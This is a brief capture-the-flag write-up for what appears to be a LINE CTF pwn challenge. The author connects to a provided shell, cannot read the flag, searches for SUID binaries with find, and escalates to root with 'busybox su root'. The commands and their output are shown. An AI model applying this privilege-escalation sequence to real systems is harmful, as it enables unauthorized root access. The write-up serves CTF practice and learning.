Tags: misc pwn suid
Rating:
Here we are given a netcat listener and we have to connect to it.
nc 34.85.38.218 10002
After connecting we will have a shell.
/ $ ls
ls
bin flag lost+found proc sys
dev lib media root tmp
ecrypt.ko lib64 mnt run usr
etc linuxrc opt sbin var
/ $
currently we are in root directory.
let's try to read the flag
/ $ cat flag
cat flag
cat: can't open 'flag': Permission denied
/ $
Permission denied!!
Let's search for any suid files on our target system
find / -perm -u=s -type f 2>/dev/null
This will give us a file named busybox
Run busybox and it will show us all the configurations which are avialable
/ $ busybox
busybox
BusyBox v1.35.0 (2022-03-22 21:54:53 JST) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.
Usage: busybox [function [arguments]...]
or: busybox --list[-full]
or: busybox --show SCRIPT
or: busybox --install [-s] [DIR]
or: function [arguments]...
BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use and BusyBox
will act like whatever it was invoked as.
Currently defined functions:
[, [[, addgroup, adduser, ar, arch, arp, arping, ascii, ash, awk,
base32, base64, basename, bc, blkid, bunzip2, bzcat, cat, chattr,
chgrp, chmod, chown, chroot, chrt, chvt, cksum, clear, cmp, cp, cpio,
crc32, crond, crontab, cttyhack, cut, date, dc, dd, deallocvt,
delgroup, deluser, devmem, df, diff, dirname, dmesg, dnsd,
dnsdomainname, dos2unix, du, dumpkmap, echo, egrep, eject, env,
ether-wake, expr, factor, fallocate, false, fbset, fdflush, fdformat,
fdisk, fgrep, find, flock, fold, free, freeramdisk, fsck, fsfreeze,
fstrim, fuser, getopt, getty, grep, gunzip, gzip, halt, hdparm, head,
hexdump, hexedit, hostid, hostname, hwclock, i2cdetect, i2cdump,
i2cget, i2cset, i2ctransfer, id, ifconfig, ifdown, ifup, inetd, init,
insmod, install, ip, ipaddr, ipcrm, ipcs, iplink, ipneigh, iproute,
iprule, iptunnel, kill, killall, killall5, klogd, last, less, link,
linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login,
logname, losetup, ls, lsattr, lsmod, lsof, lspci, lsscsi, lsusb, lzcat,
lzma, lzopcat, makedevs, md5sum, mdev, mesg, microcom, mim, mkdir,
mkdosfs, mke2fs, mkfifo, mknod, mkpasswd, mkswap, mktemp, modprobe,
more, mount, mountpoint, mt, mv, nameif, netstat, nice, nl, nohup,
nologin, nproc, nslookup, nuke, od, openvt, partprobe, passwd, paste,
patch, pidof, ping, pipe_progress, pivot_root, poweroff, printenv,
printf, ps, pwd, rdate, readlink, readprofile, realpath, reboot,
renice, reset, resize, resume, rm, rmdir, rmmod, route, run-init,
run-parts, runlevel, sed, seq, setarch, setconsole, setfattr,
setkeycodes, setlogcons, setpriv, setserial, setsid, setuidgid, sh,
sha1sum, sha256sum, sha3sum, sha512sum, shred, sleep, sort,
start-stop-daemon, strings, stty, su, sulogin, svc, svok, swapoff,
swapon, switch_root, sync, sysctl, syslogd, tail, tar, tc, tee, telnet,
test, tftp, time, top, touch, tr, traceroute, true, truncate, ts, tty,
ubirename, udhcpc, uevent, umount, uname, uniq, unix2dos, unlink,
unlzma, unlzop, unxz, unzip, uptime, usleep, uudecode, uuencode,
vconfig, vi, vlock, w, watch, watchdog, wc, wget, which, who, whoami,
xargs, xxd, xz, xzcat, yes, zcat
/ $
Notice the su service here
We got it :
run
/ $ busybox su root
busybox su root
/ # ls
ls
bin flag lost+found proc sys
dev lib media root tmp
ecrypt.ko lib64 mnt run usr
etc linuxrc opt sbin var
/ # cat flag
cat flag
LINECTF{WOW!_powerful_kernel_oor_oow}
And we have our flag ?
